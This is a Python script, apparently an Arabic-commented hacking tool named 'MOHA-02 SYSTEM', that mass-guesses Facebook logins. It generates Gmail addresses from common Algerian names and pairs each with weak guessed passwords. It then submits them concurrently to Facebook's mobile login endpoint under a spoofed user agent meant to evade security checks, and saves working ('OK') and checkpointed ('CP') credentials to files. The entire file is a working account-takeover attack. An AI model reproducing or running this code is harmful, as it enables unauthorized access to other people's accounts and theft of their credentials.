# -*- coding: utf-8 -*-
# Tool: MOHA-02 SYSTEM (Ultimate) | Dev: Moha Al-Shalfawi
# ---------------------------------------------------------
import os, sys, time, random, re, uuid, requests
from concurrent.futures import ThreadPoolExecutor as tred
from datetime import datetime

# الألوان
R = '\x1b[1;31m'; G = '\x1b[1;32m'; Y = '\x1b[1;33m'
C = '\x1b[1;36m'; W = '\x1b[1;37m'; X = '\x1b[0m'

def animated_logo():
    """حل مشكلة NameError بتعريف اللوجو في البداية"""
    logo = r"""
  __  __  ____  _   _          ___ ___  
 |  \/  |/ __ \| | | |   /\   / _ \__ \ 
 | \  / | |  | | |_| |  /  \ | | | | ) |
 | |\/| | |  | |  _  | / /\ \| | | |/ / 
 | |  | | |__| | | | |/ ____ \ |_| / /_ 
 |_|  |_|\____/|_| |_/_/    \_\___/____|"""
    os.system('clear')
    print(G + logo + X)
    print(f" {R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f" {X}[{G}*{X}] {W}DEV: {G}MOHA AL-SHALFAWI (MOHA02)")
    print(f" {X}[{G}*{X}] {W}ST: {C}OK/CP LIVE MONITOR {W}| {Y}2026")
    print(f" {R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")

class MohaData:
    def get_pass(self, name):
        """إضافة كلمات سر شائعة جداً في الجزائر بناءً على طلبك"""
        common = [
            name+name, name+"123", name+"1234", name+"12345",
            name+"2024", name+"2025", name+"2026", "10203040",
            "00008888", name+"2007", name+"02", "12345678",
            name+"@123", name+"dz", "dz1234", "algerie123"
        ]
        return list(set(common))

    def get_ua(self):
        """بصمة مخصصة لجهاز OPPO A16k لتقليل السيكور"""
        return f"Mozilla/5.0 (Linux; Android 11; OPPO A16k Build/SKQ1.211103.001) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/400.0.0.30.110;]"
class MohaEngine:
    def __init__(self):
        self.session = requests.Session()
        self.oks = 0; self.cps = 0; self.loop = 0

    def check(self, email, password):
        """المحرك الذي يصيد حسابات OK و CP"""
        try:
            self.session.headers.update({'User-Agent': MohaData().get_ua()})
            # سحب التوكنات لضمان دقة الفحص
            res = self.session.get('https://mbasic.facebook.com/login').text
            data = {
                "lsd": re.search('name="lsd" value="(.*?)"', str(res)).group(1),
                "jazoest": re.search('name="jazoest" value="(.*?)"', str(res)).group(1),
                "email": email, "pass": password, "login": "Log In"
            }
            post = self.session.post('https://mbasic.facebook.com/login/device-based/regular/login/', data=data, allow_redirects=False)
            
            if 'c_user' in self.session.cookies.get_dict():
                self.oks += 1
                self.save("OK", f"{email}|{password}")
                return "OK"
            elif 'checkpoint' in self.session.cookies.get_dict():
                self.cps += 1
                self.save("CP", f"{email}|{password}")
                return "CP"
            return "FAIL"
        except: return "ERR"

    def save(self, category, info):
        if not os.path.exists('database'): os.makedirs('database')
        with open(f'database/{category.lower()}.txt', 'a') as f:
            f.write(f"[{category}] {info}\n")

    def monitor(self, total):
        """تحديث العداد على الشاشة كما طلبت"""
        sp = ['[●○○○○]', '[○●○○○]', '[○○●○○]', '[○○○●○]', '[○○○○●]']
        sys.stdout.write(f"\r {W}{sp[self.loop % 5]} {self.loop}/{total} | {G}OK:{self.oks} {Y}CP:{self.cps}{X}")
        sys.stdout.flush()
        self.loop += 1
class MohaApp:
    def run(self):
        animated_logo()
        engine = MohaEngine()
        data_gen = MohaData()
        
        # قائمة أسماء لإنشاء الكومبو
        names = ['amine', 'abdou', 'moha', 'hamza', 'dz', 'anis']
        targets = []
        for n in names:
            for i in range(100, 300):
                targets.append({'e': f"{n}{i}@gmail.com", 'p': data_gen.get_pass(n)})
        
        total_pws = len(targets) * 16
        print(f" {G}[+] {W}إجمالي محاولات الفحص: {C}{total_pws}")
        print(f" {R}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n")

        with tred(max_workers=35) as executor:
            for item in targets:
                for pw in item['p']:
                    executor.submit(engine.check, item['e'], pw)
                    engine.monitor(total_pws)

        print(f"\n\n {G}[✔] {W}انتهى الصيد! ابحث عن النتائج في مجلد database/")

if __name__ == "__main__":
    try:
        MOHA02 = MohaApp()
        MOHA02.run()
    except KeyboardInterrupt:
        sys.exit()
